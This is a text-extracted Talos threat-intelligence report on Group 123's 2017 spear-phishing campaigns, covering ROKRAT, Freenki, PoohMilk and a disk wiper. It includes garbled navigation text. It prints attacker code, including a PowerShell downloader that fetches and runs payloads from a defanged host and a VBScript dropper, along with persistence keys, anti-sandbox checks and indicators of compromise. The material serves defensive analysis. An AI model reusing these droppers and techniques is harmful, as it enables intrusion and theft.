## SoftwareVulnerability InformationReputation CenterSupport Communities
**T** **U** **E** **S** **D** **A** **Y** **,** **J** **A** **N** **U** **A** **R** **Y** **1**
**BACK**
# Korea In The CrosshairsSnortVulnerability ReportsEmail & Web Traffic Reputation�Snort Community
**[Vulnerability Information](http://www.talosintelligence.com/vulnerability_info)**
**ClamAVMicrosoft AdvisoriesAMP Threat Naming ConventionsClamAV Community**
**[This blog post is authored by Warren Mercer andPaul Rascagneres and with contributions](http://www.talosintelligence.com/reputation)**
**RazorbackIP Blacklist DownloadProject Aspis**
**[LibraryA one year review of campaigns performed by an actor with multiple campaigns mainly linkedDaemonloggerAWBO ExercisesSpamCop](http://www.talosintelligence.com/daemon)**
**to South Korean targets.**
**Moflow�**
**[Support Communities](http://www.talosintelligence.com/community)**
**PE-Sig**
**About**
**Immunet**
**Teslacrypt Decryption Tool**
**Careers**
**MBR Filter**
**Blog**
**FIRST**
**LockyDump**
**FreeSentry**
**Flokibot Tools**
**Synful Knock Scanner**
**Cisco Smart Install Scanner**
**ROPMEMU**
**BASS**
|Col1|S Vu R S|
|---|---|
|T U E S D A Software|Y airs SVESu CMACll n Me RIPPr forDASm M P Im Te M FI|
|Korea In The Crossh Vulnerability Information||
|This blog post is authored by Warre Reputation Center from Jungsoo An.||
|LAib oranrey year review of campaigns per||
|to South Korean targets. Support Communities||
|About||
|Careers||
|Blog||
**PE-Sig**
**About**
**Immunet**
**Teslacrypt Decryption Tool**
**Careers**
**MBR Filter**
**FIRST**
**LockyDump**
**FreeSentry**
**Flokibot Tools**
**Synful Knock Scanner**
**Cisco Smart Install Scanner**
**ROPMEMU**
### E X E C U T PyREBoxI V E S U M M A
**File2pcap**
**This article exposes the malicious activities of Group 123 during 2017. We assess with high**
**confidence that Group 123 was responsible for the following six campaigns:�**
**Decept**
**"Golden Time" campaign.**
**"Evil New Year" campaign.**
**"Are you Happy?" campaign.**
**"FreeMilk" campaign.**
**Mutiny Fuzzer**
-----
**On January 2nd of 2018, the "Evil New Year 2018" was started. This campaign copies the**
**approach of the 2017 "Evil New Year" campaign.**
**The links between the different campaigns include shared code and compiler artifacts such as**
**PDB (Program DataBase) patterns which were present throughout these campaigns.**
**Based on our analysis, the "Golden Time", both "Evil New Year" and the "North Korean Human**
**Rights" campaigns specifically targeted South Korean users. The attackers used spear�**
**phishing emails combined with malicious HWP documents created using Hancom Hangul**
**Office Suite. Group 123 has been known to use exploits (such as CVE-2013-0808) or scripting�**
**languages harnessing OLE objects. The purpose of the malicious documents was to install and**
**to execute ROKRAT, a remote administration tool (RAT). On occasion the attackers directly**
**included the ROKRAT payload in the malicious document and during other campaigns the**
**attackers leveraged multi-stage infection processes: the document only contained a**
**downloader designed to download ROKRAT from a compromised web server.**
**Additionally, the "FreeMilk" campaign targeted several non-Korean financial institutions. In this�**
**campaign, the attackers made use of a malicious Microsoft Office document, a deviation from�**
**their normal use of Hancom documents. This document exploited a newer vulnerability, CVE-**
**2017-0199. Group 123 used this vulnerability less than one month after its public disclosure.**
**During this campaign, the attackers used 2 different malicious binaries: PoohMilk and Freenki.**
**PoohMilk exists only to launch Freenki. Freenki is used to gather information about the**
**infected system and to download a subsequent stage payload. This malware was used in**
**several campaigns in 2016 and has some code overlap with ROKRAT.**
**Finally, we identified a 6th campaign that is also linked to Group 123. We named this 6th�**
**campaign "Are You Happy?". In this campaign, the attackers deployed a disk wiper. The**
**purpose of this attack was not only to gain access to the remote infected systems but to also**
**wipe the first sectors of the device. We identified that the wiper is a ROKRAT module.�**
**This actor was very active this year and continued to mainly focus on South Korea. The group**
**leveraged spear phishing campaigns and malicious documents the contents of which included**
**very specific language suggesting that they were crafted by native Korean speakers rather than�**
**through the use of translation services. The actor has the following demonstrated capabilities:**
**To include exploits (for Hangul and Microsoft Office) in its workflows.�**
**To modify its campaigns by splitting the payload in to multiple stages**
**To use compromised web servers or legitimate cloud based platforms.**
**To use HTTPS communications to make it harder to perform traffic analysis.�**
**To compromise third parties to forge realistic spear phishing campaigns (i e Yonsei**
-----
### T H E T I M E L I N E
**Here is the timeline for 2017 and the beginning of 2018:**
### A U G U S T 2 0 1 6 T O M C A M P A I G N
**As with the majority of Group 123 campaigns, the initial attack vector during this campaign was**
**spear phishing. Talos identified two different kinds of emails. The first email we discovered was�**
**the most interesting. In this sample, we observed the attackers praising the user for joining a**
**panel related to the "Korean Reunification and North Korean Conference". The text in the email�**
**explained that the recipient should complete the attached document to provide necessary**
**feedback. This appears to be a non-existent conference. The closest match we identified�**
**related to any Unification conference was held in January 2017, which was the NYDA�**
**Reunification conference. The sender was '�kgf2016@yonsei.ac.kr' which is the contact email of**
**the Korea Global Forum, a separate conference.**
**When we analyzed the email headers, we determined that the email was sent from an SMTP**
**server using an IP associated with the Yonsei University network. We believe that the email**
**address was compromised and abused by the attackers to send the email used in this**
**campaign.**
**The filename for the malicious attachment translates as 'Unification North Korea Conference _�**
**Examination Documents' which reinforces the text in the email about the reunification�**
**conference. For an added bonus, in the body of the email, the attacker even suggests that**
**people who completed the document would get paid a 'small fee'. Perhaps the gift of**
**embedded malware is the payment:**
-----
**Much less effort was used to craft the second email Talos analyzed. The email was from a free**
**Korean mail service provided by Daum, Hanmail, indicating that there was no attempt to try to**
**appear as if it originated from an official body or person, unlike the previous email described.�**
**The subject was simply 'Request Help' while the attachment filename was 'I'm a munchon�**
**person in Gangwon-do, North Korea'. We suspect the attacker was trying to generate**
**sympathy by reminding the reader that Munchon and the province it is in, Kangwon, were part**
**of a unified province that included South Korea's Gangwon-do prior to the division of Korea in�**
**1945.**
**A second email contained a story about a person called 'Ewing Kim' who was looking for help:**
-----
**The email's attachments are two different HWP documents, both leveraging same vulnerability**
**(CVE-2013-0808). This vulnerability targets the EPS (Encapsulated PostScript) format. The**
**purpose of the shellcode is to download a payload from the Internet. The first email displays�**
**the following decoy document to the infected user and download the following payload:**
**hxxp://discgolfglow[.]com:/wp-content/plugins/maintenance/images/worker.jpg**
**The second email displays the following decoy document to the infected user and downloads**
-----
**hxxp://acddesigns[.]com[.]au/clients/ACPRCM/kingstone.jpg**
**In both cases, the downloaded payload is the ROKRAT malware.**
**The first tasks of this variant of ROKRAT is to check the operating system version. If Windows�**
**XP is detected, the malware executes an infinite loop. The purpose is to generate empty�**
**reports if opened on sandbox systems running Windows XP machines. Additionally it checks to**
**determine if common analysis tools are currently running on the infected system. If it detects**
**the presence of these tools, the malware performs two network requests to legitimate**
**websites:**
**hxxps://www[.]amazon[.]com/Men-War-**
**PC/dp/B001QZGVEC/EsoftTeam/watchcom.jpg**
**hxxp://www[.]hulu[.]com/watch/559035/episode3.mp4**
**The Amazon URL displays a WWII game called 'Men of War' while the Hulu URL attempts to**
**stream a Japanese anime show called 'Golden Time':**
-----
**One of the identifying characteristics of ROKRAT is the fact that it uses social network and**
**cloud platforms to communicate with the attackers. These platforms are used to exfiltrate�**
**documents and receive instructions. Here is a list of the platforms used by this variant: Twitter,**
**Yandex and Mediafire. The tokens for each platform are hardcoded within the sample:�**
-----
### C A M P A I G N
**In the early part of 2017, Group123 started the "Evil New Year" campaign. In this campaign the**
**actors tried to fool victims by pretending the emails were from the Korean Ministry of**
**Unification and that they offered Korean-specific analysis. �This campaign began with a handful**
**of spear phishing emails to South Korean targets and containing malicious attachments.**
**Group123 further attempted to entice victims to open the attachments by using common**
**Hancom Hangul documents. Hancom's Hangul is a popular Office Suite used primarily in the�**
**Korean peninsula. The use of Hangul office documents has the advantage of being the norm�**
**for the Korean peninsula. If the attacker used Microsoft documents, it may have raised**
**suspicions in the victim. Given the regional file format used there is a chance that some�**
**security software suites may not handle them well, and this may have provided an evasion**
**case for the attacker.**
**The documents sent to the targets were titled "Analysis of "Northern New Year in 2017" and**
**used the official logo of the Korean Ministry of Unification. This is a simple choice for the actor�**
**to make, but it further shows their familiarity with the region.**
**The document claimed to discuss the New Year's activities of North Korea and this would have**
**been something that the victims in South Korea would be very interested in. This would have**
-----
**This document was a decoy aimed to entice the user to open malicious documents embedded**
**further down the page**
**The actor embedded two additional links and the document urged the user to click on these**
**links for more information about New Year's activities in North Korea. The first link was labeled�**
**as "Comparison of Major Tasks in '16 & '17" and the second link was identified as "Comparison�**
**between '16 & '17".**
**Upon opening these links the user was presented with a further decoy Hangul document. This**
**document was well written and further increases our confidence that we are dealing with a new�**
**Korean actor. These documents contained malicious OLE objects used to drop binaries.**
-----
**This time, however, they contained malicious OLE (Object Link Embedded) objects.**
**Initial analysis confirmed two similarly sized OLE object files within this document which�**
**appeared to be the same from an execution point of view.**
**The two dropped binaries were stored and executed in this location during our analysis:**
**C:\Users\ADMINI~1\AppData\Local\Temp\Hwp (2).exe**
**C:\Users\ADMINI~1\AppData\Local\Temp\Hwp (3).exe**
**Initial analysis showed some sloppy cleaning up from Group123, which we used later to**
**determine that separate campaigns were the work of this same actor, as compilation artifacts**
**remained within the binaries:**
**e:\Happy\Work\Source\version 12\T+M\Result\DocPrint.pdb**
**The second stage of the dropped binaries was used to execute wscript.exe while injecting**
**shellcode into this process. The shellcode is embedded within the resource 'BIN' and is used to**
**unpack another PE32 binary and use wscript.exe to execute it. To do this, Group123 uses a**
-----
**The new PE32 unpacked from the shellcode is an initial reconnaissance malware which is**
**used to communicate with the C2 infrastructure to obtain the final payload. The information this�**
**malware collected included the following:**
**The computer name**
**The username**
**The execution path of the sample**
**The BIOS model**
**A randomly-generated ID to uniquely identify the system**
**Group123 utilized this method to ensure their victim was (a) someone they wanted to target**
**further and (b) someone they could infect further based on the information obtained from the**
**reconnaissance phase.**
**Further network analysis showed that the binary attempted to connect to the following URLs:**
**www[.]kgls[.]or[.]kr/news2/news_dir/index.php**
**www[.]kgls[.]or[.]kr/news2/news_dir/02BC6B26_put.jpg**
**Korean Government Legal Services (KGLS) is a legitimate Korean government body that**
**manages Korean government legal affairs. By compromising the KGLS, the attacker gained a**
**trusted platform from which to execute an attack.**
**The initial network connection is to 'index.php'. This connection transmits the information**
**gathered during the reconnaissance phase. The attacker uses this information to then**
**determine the specific filename (based on the random ID) to serve to the infected victim. In our�**
**case this was 02BC6B26 - this meant a file "02BC6B26_put.jpg" was created for us on the�**
**attackers C2. This file is then dropped and renamed 'officepatch.exe' on the victim's machine.�**
**Because the attacker was careful about who they attacked, we were unable to obtain this file�**
**during our analysis.**
**During our investigation we were able to identify additional Command and Control**
**infrastructure used by this actor. Four C2s were observed, based in the following countries:**
**3 C2 in South Korea**
**1 C2 in the Netherlands**
**Here is a global map of the identified infrastructure:�**
-----
**Contrary to the previous campaign, the attackers separated the reconnaissance phase from**
**the main ROKRAT payload. This trick was likely used to avoid detection. This is an interesting**
**adaptation in Group 123's behavior.**
### M A R C H 2 0 1 7 : " A R E
**In March 2017, Group 123 compiled a disk wiper. The malware contains 1 function, the**
**purpose is to open the drive of the infected system (\\.\PhysicalDrive0) and write the following**
**data to the MBR:**
-----
**malware reboots the machine with the following command: c:\windows\system32\shutdown /r /t**
**1**
**After the reboot, the MBR displays the following string to the user:**
**The link to the other campaigns was the following PDB path:**
**D:\HighSchool\version**
**13\VC2008(Version15)\T+M\T+M\TMProject\Release\ErasePartition.pdb**
**As you can see, it perfectly matches the ROKRAT PDB. This wiper is a ROKRAT module**
**named ERSP.enc. We assume that ERSP means ERaSePartition. This module can be**
**downloaded and executed on demand by Group 123.**
**This sample is interesting considering the attack in December 2014 against a Korean power**
**plant where the message that was displayed by the wiper was "Who Am I?".**
### M A Y 2 0 1 7 : " F R E E M
**This campaign targeted non-Korean financial institutions, but unlike the other campaigns, this�**
**one does not use HWP documents. It instead uses Office documents. This change is because�**
**Group 123 did not target South Korea during this campaign and Microsoft Office is standard in�**
**the rest of the world.**
### Infection Vectors
**The attackers exploited CVE-2017-0199 in order to download and execute a malicious HTA**
**document inside of Microsoft Office. The URL used can be found in the embedded OLE object:�**
-----
**Here is the source code of the downloaded HTA document:**
****
****
****
****
**Bonjour**
****
****
****
****
**Once decoded using the base64 algorithm, we are able to read the final payload:�**
**$c=new-object System.Net.WebClient**
**$t =$env:temp**
**$t1=$t+"\\alitmp0131.jpg"**
**$t2=$t+"\\alitmp0132.jpg"**
**$t3=$t+"\\alitmp0133.js"**
**try**
**{**
**echo $c.DownloadFile( "hxxp://old[.]jrchina[.]com/btob_asiana/appach01.jpg",$t1)**
**$c.DownloadFile( "hxxp://old[.]jrchina[.]com/btob_asiana/appach02.jpg",$t2)**
**$c.DownloadFile( "hxxp://old[.]jrchina[.]com/btob_asiana/udel_ok.ipp",$t3)**
**wscript.exe $t3**
**}**
**catch**
-----
**The purpose of this script is to download and execute a Windows script and two encoded**
**payloads. The script is used to decode and execute the following payloads:**
**Appach01.jpg (renamed: Windows-KB275122-x86.exe) is a Freenki sample.**
**Appach01.jpg (renamed: Windows-KB271854-x86.exe) is a PoohMilk sample.**
### PoohMilk Analysis
**The PoohMilk sample is designed to perform two actions:**
**Create persistence to execute the Freenki sample at the next reboot.**
**Check specific files on the infected machine.�**
**The first action is to create a registry key in order to execute the �Windows-KB275122-x86.exe**
**file previously downloaded. The file is executed with the argument: "help". Here is the registry�**
**creation:**
-----
**The registry location where persistence is achieved is:**
**HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update. At the next reboot,**
**the malware will be executed.**
**The second action is to check if the file "wsatra.tmp" exists in the temporary directory of the�**
**current user. If this file exists, the content is read in order to obtain a path to find a second file�**
**with the LNK (link) extension. The LNK file is finally used to identify a third file: a ZIP file. The�**
**file will be inflated in order to retrieve a RTF document, this document will be displayed to the�**
**infected user by executing Wordpad.**
**Here is the PDB path from the PoohMilk sample:**
**E:\BIG_POOH\Project\milk\Release\milk.pdb**
### Freenki Sample
**The purpose of Freenki is to collect information on the infected system and to download a third**
**executable.**
**This sample can be executed with 3 different arguments:**
**"Help": the value configured by PoohMilk. In this context the main function is�**
**executed.**
**"Console": with the argument, a persistence is configured and the malware will be�**
**executed at the next reboot (**
**HKCU\Software\Microsoft\Windows\CurrentVersion\Run\runsample ).**
**"Sample": with this argument, the malware executes the console command**
**followed by the help command.**
**The information collected is performed using WMI queries:**
-----
**Additionally the malware lists the running process via the Microsoft Windows API. The malware**
**uses obfuscation in order to hide strings such as URL or User-Agent, the algorithm is based on**
**bitwise (SUB 0x0F XOR 0x21), here is the decoded data:**
**hxxp://old[.]jrchina[.]com/btob_asiana/udel_confirm.php�**
**Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR**
**2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0;**
**.NET4.0C; Tablet PC 2.0; .NET4.0E; InfoPath.3)**
**The downloaded third payload is obfuscated using the same technique. The file is a fake image�**
**starting with "PNGF".**
### N O V E M B E R 2 0 1 7 : " C A M P A I G N
**In November 2017, Talos observed the latest Group123 campaign of the year, which included a**
**new version of ROKRAT being used in the latest wave of attacks. Group 123 again used one**
**of their main calling cards, the malicious HWP document. This time, Group 123 used a**
**document containing information in relation to a meeting held on 1st November in Seoul, South**
**Korea. This document was alleged to have been written by a legal representative claiming to**
**be representing the "Citizens' Alliance For North Korean Human Rights And Reunification Of�**
**Korean Peninsula". Group 123 once again uses information related to the Korean unification�**
**and now are claiming to highlight concerns related to human rights issues.**
**The document brought Talos a new gift - a new version of ROKRAT. Following on with the**
**normal Group 123 activity the document was written in perfect Korean text and dialect again**
**suggesting the origin of this group is from the Korean peninsula.**
-----
**Further analysis of the document text allowed us to understand the context. The document**
**mentions 'Community of North Korean human rights and unification' with the lawyer claiming to�**
**be part of the "Citizen's Alliance for North Korean Human Rights and North-South unification".�**
**The main purpose of this document was an attempt to arrange a meeting to discuss items**
**related to "North Korean Human Rights Act" and "Enactment of a Law" which was passed in**
**2016 in South Korea. We believe that the document was attempting to target stakeholders**
**within the '올인통' community in an attempt to entice them to join the discussion in an attempt to**
**work on additional ideas related to these activities. The meeting was due to take place on**
**November 1, 2017 and this document was trying to garner additional interest prior to the**
**meeting.**
**Once again Group 123 leveraged the use of OLE objects within the HWP document. Analysis**
**starts with a zlib decompression (a standard action of HWP documents) and we're able to**
**recover the following script:**
**const strEncode =**
**"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA**
-----
**DIM shell_obj**
**SET shell_obj = CreateObject("WScript.Shell")**
**DIM fso**
**SET fso = CreateObject("Scripting.FileSystemObject")**
**outFile = "c:\ProgramData\HncModuleUpdate.exe"**
**base64Decoded = decodeBase64(strEncode)**
**IF NOT(fso.FileExists(outFile)) then**
**writeBytes outFile, base64Decoded**
**shell_obj.run outFile**
**END IF**
**WScript.Quit()**
**private function decodeBase64(base64)**
**DIM DM, EL**
**SET DM = CreateObject("Microsoft.XMLDOM")**
**SET EL = DM.createElement("tmp")**
**EL.DataType = "bin.base64"**
**EL.Text = base64**
**decodeBase64 = EL.NodeTypedValue**
**end function**
**private Sub writeBytes(file, bytes)�**
**DIM binaryStream**
**SET binaryStream = CreateObject("ADODB.Stream")**
**binaryStream.Type = 1**
**binaryStream.Open**
**binaryStream.Write bytes**
**binaryStream.SaveToFile file, 1�**
**End Sub**
**This script is executed and is used to decode a static base64 string within the strEncode**
**variable. Using base64 encoding the decoded binary is stored as HncModuleUpdate.exe and**
**is then executed. This is the ROKRAT dropper. Talos suspect the filename may have been�**
**selected to make it appear within running processes as a potential Hancom updater.**
**The dropper is used to extract a new resource named SBS. This specific resource contains�**
**malicious shellcode used by the malware. Additionally we see a cmd.exe process launched**
**and used for process injection using the VirtualAlloc(), WriteProcessMemory() and**
**CreateRemoteThread() Windows APIs, as with the first finding of ROKRAT they continue to�**
**use similar Windows APIs. The following graph view from IDA shows these steps.**
-----
**These execution steps allow the launch of the new ROKRAT variant by decoding the PE binary**
**and injecting into the cmd.exe process.**
**One of Group 123 oddities in this campaign was to drop the following picture as a decoy image**
**to the user. This image shows various publicly available images which look to be related to the**
**Korean 'Independence Movement' and appear to be related to the Korean war.**
-----
**We began performing further in-depth analysis on this new version of ROKRAT and this is**
**where we started to notice some similarities with Group 123s "Evil New Years" campaign. The**
**similitudes are discussed later in this paper.**
**This ROKRAT variant contained anti-sandbox techniques. This is performed by checking if the**
**following libraries are loaded on the victim machine.**
**SbieDll.dll (sandboxie library)**
**Dbghelp.dll (Microsoft debugging tools)**
**Api_log.dll (threatAnalyzer / GFI SandBox)**
**Dir_watch.dll (threatAnalyzer / GFI SandBox)**
-----
**analysis difficult, Group 123 used an anti-debugging technique related to NOP (No Operation).�**
**nop dword ptr [eax+eax+00h] is a 5 byte NOP. But this opcode is not correctly supported by**
**some debugging tools, Immunity Debugger for example, will replace the assembly by "???" in**
**red making it difficult to attempt to debug.�**
**This version of ROKRAT came with a Browser Stealer mechanism which was similar, with a**
**few modifications, to that used in the FreeMilk campaign using Freenki malware in 2016.�**
**Group 123 continued their use of Cloud platforms with this campaign, this time leveraging**
**pCloud, Dropbox, Box and Yandex.**
**Finally here is the PDB of the sample used during this campaign:**
**d:\HighSchool\version 13\2ndBD\T+M\T+M\Result\DocPrint.pdb**
### J A N U A R Y 2 0 1 8 : " E
**As we observed at the beginning of 2017, Group 123 started a campaign corresponding with**
**the new year in 2018. This campaign started on the 2nd of January. The infection vector was a**
-----
**This decoy document is an analysis of the 2018 New Year speech made by the leader of North**
**Korea. The approach is exactly the same as what was seen in 2017 using a new decoy**
**document. This document was alleged to have been written by the Ministry of Reunification as�**
**demonstrated by the logo in the top left.**
**Similar to the "Golden Time" campaign, this document exploits an EPS vulnerability in order to**
**download and execute shellcode located on a compromised website:**
**hxxp://60chicken[.]co[.]kr/wysiwyg/PEG_temp/logo1.png**
**The fake image usage is a common pattern for this group. This image contains shellcode used**
**to decode the embedded final payload: ROKRAT. This ROKRAT variant is loaded from�**
**memory. It's a fileless version of ROKRAT. This behavior shows that Group 123 is constantly�**
**evolving to avoid detection. As usual, the ROKRAT sample uses cloud providers to**
**communicate with the operator, this time leveraging Yandex, pCloud, Dropbox and Box.**
### L I N K S B E T W E E N C A
Code Sharing
-----
**are shared in the samples mentioned in this article; however we will cover only two in this**
**article: the reconnaissance phase and the browsers stealer.**
**RECONNAISSANCE PHASE**
**The ROKRAT samples used during the two "Evil New Year" and the "North Korean Human**
**Rights" campaigns contained a reconnaissance phase. In the "Evil New Year" campaign the**
**payload was split into two parts, the first part contained the reconnaissance code. In the other�**
**campaign the reconnaissance phase was directly included in the main payload. This code is**
**the same.**
**The malware uses the following registry key to get the machine type:**
**HKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosData. The "System**
**manufacturer" value is used to identify the type of machine. The code appears to be based on**
**a forum post (rohitab.com) describing the use of the Win32 APIs used. The source code only**
**considers the following machine types:**
**default: lpString = "(Other)"; break;**
**case 0x02: lpString = "(Unknown)"; break;**
**case 0x03: lpString = "(Desktop)"; break;**
**case 0x04: lpString = "(Low Profile Desktop)"; break;�**
**case 0x06: lpString = "(Mini Tower)"; break;**
**case 0x07: lpString = "(Tower)"; break;**
**case 0x08: lpString = "(Portable)"; break;**
**case 0x09: lpString = "(Laptop)"; break;**
**case 0x0A: lpString = "(Notebook)"; break;**
**case 0x0E: lpString = "(Sub Notebook)"; break;**
**The string format - with the () - and the considering types are exactly the same as those used**
**in the ROKRAT samples.**
**It's interesting to note that this reconnaissance phase was not included in the ROKRAT variant**
**used during the "Golden Time" campaign.**
**BROWER STEALER**
**For the first time, the ROKRAT sample used during the "North Korean Human Rights"�**
**contained a browser credentials stealer. The code used to perform this task in the same that**
**found within in a Freenki sample deployed in 2016.**
**The malware is able to extract the stored passwords from Internet Explorer, Chrome and**
**Firefox For Chrome and Firefox the malware queries the sqlite database containing the URL**
-----
**Additionally, they support the Microsoft Vault mechanism. Vault was implemented in Windows**
**7, it contains any sensitive data (like the credentials) of Internet Explorer. Here is the**
**initialization of the Vault APIs:**
-----
**On the left, we have the ROKRAT sample and on the right the FreeMilk sample. You can see**
**that in addition to the code, the author copy-pasted English typos such as "IE Registery":**
### PDB Paths
**We can clearly identify a pattern in the PDB naming convention of all the binaries mentioned in**
**this article.**
**ROKRAT:**
**e:\Happy\Work\Source\version 12\T+M\Result\DocPrint.pdb (from the "Evil New**
**Year" campaign)**
**d:\HighSchool\version 13\2ndBD\T+M\T+M\Result\DocPrint.pdb (from the "North**
**Korean Human Rights" campaign**
**D:\HighSchool\version 13\First-Dragon(VS2015)\Sample\Release\DogCall.pdb**
**(ROKRAT Sample from an unidentified campaign from June)�**
**Wiper:**
-----
**13\VC2008(Version15)\T+M\T+M\TMProject\Release\ErasePartition.pdb (From the**
**"Are You Happy?" campaign)**
### S U M M A R Y G R A P H
**Here is a graph to visualize the similarities and differences between each campaign mentioned**
**in this article:**
### C O N C L U S I O N
**South Korea is becoming an important target for malicious actors and the techniques used are**
**becoming specific to the region (for example: use of native language to try and ensure the�**
**targets feel that the information, document or email being sent to them has added legitimacy).**
**In a specific campaign, this actor took time to compromise multiple legitimate Korean platforms�**
**including Yonsei and the KGLS in order to forge the spear phishing campaign or to host the**
**command and control. This approach is not common with less advanced actors and**
**demonstrates a high level of maturity and knowledge of the Korean region.**
**However Group 123's activities are not limited to South Korea. For international targets, they**
**are able to switch to a more standard attack vector such as using Microsoft Office documents�**
**as opposed to the specific HWP documents used when targeting victims located in Korea.�**
**Group 123 does not hesitate to use public exploits and scripting languages to drop and**
**execute malicious payloads. We can notice that this group uses compromised legitimate**
**websites (mainly Wordpress) and cloud platforms to communicate with the infected systems.**
**This approach makes it difficult to detect communications through analysis of these network�**
**flows. Even if the arsenal of this actor is diverse, we have identified some patterns, copy-paste�**
**code from various public repositories and similarities between the different piece of code. In**
**addition to the Remote Administration Tools, we identified a wiper. We conclude that this group�**
**was involved in a campaign of intelligence gathering and finally attempted destruction.�**
**With our current knowledge of this actor, we predict that they will not disappear anytime soon**
**and will continue to be active during the coming years. Group 123 is constantly evolving as the**
-----
**explained their capabilities will likely continue to evolve over time as they further refine their�**
**TTPs.**
### I O C S
"Golden Time" Campaign:
**Maldoc #1 sha256:**
**7d163e36f47ec56c9fe08d758a0770f1778fa30af68f39aac80441a3f037761e**
**Maldoc #2 sha256:**
**5441f45df22af63498c63a49aae82065086964f9067cfa75987951831017bd4f**
**ROKRAT #1: cd166565ce09ef410c5bba40bad0b49441af6cfb48772e7e4a9de3d646b4851c**
**ROKRAT #1: 051463a14767c6477b6dacd639f30a8a5b9e126ff31532b58fc29c8364604d00**
**Network:**
**Malicious URLs:**
**- hxxp://discgolfglow[.]com/wp-content/plugins/maintenance/images/worker.jpg**
**- hxxp://acddesigns[.]com[.]au/clients/ACPRCM/kingstone.jpg**
**Safe URLs:**
**- hxxps://www[.]amazon[.]com/Men-War-PC/dp/B001QZGVEC/EsoftTeam/watchcom.jpg**
**- hxxp://www[.]hulu[.]com/watch/559035/episode3.mp4**
### "Evil New Year" Campaign:
**Maldoc sha256: 281828d6f5bd377f91c6283c34896d0483b08ac2167d34e981fbea871893c919**
**Dropped #1: 95192de1f3239d5c0a7075627cf9845c91fd397796383185f61dde893989c08a**
**Dropped #2: 7ebc9a1fd93525fc42277efbccecf5a0470a0affbc4cf6c3934933c4c1959eb1**
**Dropped #3: 6c372f29615ce8ae2cdf257e9f2617870c74b321651e9219ea16847467f51c9f**
**Dropped #4: 19e4c45c0cd992564532b89a4dc1f35c769133167dc20e40b2a41fccb881277b**
**Dropped #5: 3a0fc4cc145eafe20129e9c53aac424e429597a58682605128b3656c3ab0a409**
**Dropped #6: 7d8008028488edd26e665a3d4f70576cc02c237fffe5b8493842def528d6a1d8**
**Unpacked #1: 7e810cb159fab5baccee7e72708d97433d92ef6d3ef7d8b6926c2df481ccac2f**
**Unpacked #1: 21b098d721ea88bf237c08cdb5c619aa435046d9143bd4a2c4ec463dcf275cbe**
**Unpacked #1: 761454dafba7e191587735c0dc5c6c8ab5b1fb87a0fa44bd046e8495a27850c7**
**Unpacked #1: 3d442c4457cf921b7a335c0d7276bea9472976dc31af94ea0e604e466596b4e8**
**Unpacked #1: 930fce7272ede29833abbfb5df4e32eee9f15443542434d7a8363f7a7b2d1f00**
**Unpacked #1: 4b20883386665bd205ac50f34f7b6293747fd720d602e2bb3c270837a21291b4**
**Unpacked #1: f080f019073654acbe6b7ab735d3fd21f8942352895890d7e8b27fa488887d08**
**Network:**
-----
**- www[.]imuz[.]com/admin/data/bbs/review2/board/123.php**
**- www[.]imuz[.]com/admin/data/bbs/review2/board/02BC6B26_put.jpg (where 02BC6B26 is**
**randomly generated)**
**- www[.]wildrush[.]co[.]kr/bbs/data/image/work/webproxy.php**
**- www[.]wildrush[.]co[.]kr/bbs/data/image/work/02BC6B26_put.jpg (where 02BC6B26 is**
**randomly generated)**
**- www[.]belasting-telefoon[.]nl//images/banners/temp/index.php**
**- www[.]belasting-telefoon[.]nl//images/banners/temp/02BC6B26_put.jpg (where 02BC6B26 is**
**randomly generated)**
**- www[.]kgls[.]or[.]kr/news2/news_dir/index.php**
**- www[.]kgls[.]or[.]kr/news2/news_dir/02BC6B26_put.jpg (where 02BC6B26 is randomly**
**generated)**
### "Are You Happy?" Campaign:
**Wiper sha256: 6332c97c76d2da7101ad05f501dc1188ac22ce29e91dab6d0c034c4a90b615bd**
### "FreeMilk" Campaign:
**Office sha256: f1419cde4dd4e1785d6ec6d33afb413e938f6aece2e8d55cf6328a9d2ac3c2d0�**
**HTA sha256: a585849d02c94e93022c5257b162f74c0cdf6144ad82dd7cf7ac700cbfedd84f**
**JS sha256: 1893af524edea4541c317df288adbf17ae4fcc3a30d403331eae541281c71a3c**
**PoohMilk sha256:**
**35273d6c25665a19ac14d469e1436223202be655ee19b5b247cb1afef626c9f2**
**Freenki sha256: 7f35521cdbaa4e86143656ff9c52cef8d1e5e5f8245860c205364138f82c54df**
**Freenki 2016: 99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5**
**Network:**
**- hxxp://old[.]jrchina[.]com/btob_asiana/udel_calcel.php?fdid=[base64_data]**
**- hxxp://old[.]jrchina[.]com/btob_asiana/appach01.jpg**
**- hxxp://old[.]jrchina[.]com/btob_asiana/appach02.jpg**
**- hxxp://old[.]jrchina[.]com/btob_asiana/udel_ok.ipp**
**- hxxp://old[.]jrchina[.]com/btob_asiana/udel_confirm.php�**
### "North Korean Human Rights" Campaign:
**Maldoc sha256: 171e26822421f7ed2e34cc092eaeba8a504b5d576c7fd54aa6975c2e2db0f824**
**Dropper #1: a29b07a6fe5d7ce3147dd7ef1d7d18df16e347f37282c43139d53cce25ae7037**
**Dropper #2: eb6d25e08b2b32a736b57f8df22db6d03dc82f16da554f4e8bb67120eacb1d14**
**Dropper #3: 9b383ebc1c592d5556fec9d513223d4f99a5061591671db560faf742dd68493f**
**ROKRAT:: b3de3f9309b2f320738772353eb724a0782a1fc2c912483c036c303389307e2e**
-----
**Maldoc sha256: f068196d2c492b49e4aae4312c140e9a6c8c61a33f61ea35d74f4a26ef263ead**
**PNG : bdd48dbed10f74f234ed38908756b5c3ae3c79d014ecf991e31b36d957d9c950**
**ROKRAT:: 3f7827bf26150ec26c61d8dbf43cdb8824e320298e7b362d79d7225ab3d655b1**
**Network:**
**- hxxp://60chicken[.]co[.]kr/wysiwyg/PEG_temp/logo1.png**
### R E F E R E N C E S
**[http://blog.talosintelligence.com/2017/02/korean-maldoc.html](http://blog.talosintelligence.com/2017/02/korean-maldoc.html)**
**[http://blog.talosintelligence.com/2017/04/introducing-rokrat.html](http://blog.talosintelligence.com/2017/04/introducing-rokrat.html)**
**[http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html](http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html)**
